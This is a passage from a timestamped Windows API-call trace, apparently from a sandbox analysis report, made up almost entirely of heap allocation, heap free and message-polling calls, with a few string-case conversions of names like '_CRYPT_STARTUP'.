Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.412] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.412] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.412] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0081.412] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0081.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0081.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0081.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.414] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb360 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0081.415] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0081.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb378 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0081.415] PeekMessageW (in: lpMsg=0x144e02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e02c) returned 0 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0081.416] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0081.416] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0081.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb108 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0081.416] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.417] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.417] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.417] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.417] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0081.417] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0081.418] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0081.418] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0081.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb378 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.418] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0081.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0081.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0081.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa39c) returned 0x49b8b00 [0081.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49b8b00 | out: hHeap=0x1780000) returned 1 [0081.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0081.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0081.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4150 [0081.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0081.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0081.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 